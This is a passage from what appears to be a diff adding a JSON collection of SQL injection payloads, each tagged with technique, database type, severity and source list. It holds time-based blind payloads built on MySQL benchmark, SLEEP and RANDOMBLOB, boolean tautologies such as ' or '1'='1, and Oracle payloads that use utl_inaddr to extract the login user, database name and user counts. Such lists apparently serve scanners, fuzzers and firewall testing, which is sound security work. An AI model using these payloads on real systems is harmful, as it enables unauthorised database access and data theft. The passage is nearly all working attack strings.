"medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-INSERT" + } + }, + { + "payload": "1'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_Fuzz" + } + }, + { + "payload": "1\"", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_Fuzz" + } + }, + { + "payload": "1/*'*/", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_Fuzz" + } + }, + { + "payload": "1/*!1111'*/", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_Fuzz" + } + }, + { + "payload": "1' or '1'='1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_Fuzz" + } + }, + { + "payload": "1 or 1=1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_Fuzz" + } + }, + { + "payload": "'or''='", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_Fuzz" + } + }, + { + "payload": "’ or ‘1’=’1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' or '1'='1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i", + 